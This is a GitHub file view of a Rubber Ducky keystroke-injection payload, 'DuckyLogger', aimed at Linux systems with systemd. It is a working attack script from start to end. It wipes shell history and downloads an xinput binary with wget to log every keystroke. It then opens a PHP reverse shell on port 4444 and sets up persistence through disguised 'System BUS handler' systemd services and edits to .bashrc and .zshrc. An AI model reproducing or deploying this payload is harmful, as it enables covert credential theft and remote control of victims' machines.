-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathpayload.txt
93 lines (83 loc) · 3.25 KB
/
payload.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
REM Title: DuckyLogger
REM Description: Key logger which sends each and every key stroke of target remotely/locally.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Credentials
REM Target: Unix-like operating systems with systemd
REM Attackmodes: HID
REM [Note]
REM Visit https://github.com/drapl0n/DuckyLogger for usage and other important instructions.
REM [keeping tracks clear]
DELAY 500
CTRL-ALT t
DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 100
REM [creating key logging mechanism]
STRING mkdir /var/tmp/.system
ENTER
DELAY 100
STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/sys
ENTER
DELAY 100
REM [importing xinput]
STRING cd /var/tmp/.system/
ENTER
DELAY 100
STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
ENTER
DELAY 2500
STRING chmod +x xinput
ENTER
DELAY 100
REM [creating reverse shell]
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100
REM [creating systemd service to execute payload on boot]
STRING mkdir -p ~/.config/systemd/user
ENTER
DELAY 200
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100
REM [creating reboot script incase if listner stops or targets internet connection gets lost]
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/reboot
ENTER
DELAY 100
REM [creating systemd service to execute payload on boot]
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
ENTER
DELAY 100
REM [enabling service]
STRING systemctl --user daemon-reload
ENTER
DELAY 300
STRING systemctl --user enable --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user start --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user enable --now reboot.service
ENTER
DELAY 150
STRING systemctl --user start --now reboot.service
ENTER
DELAY 100
REM [autostarting service on terminal/shell launch]
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
ENTER
DELAY 100
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER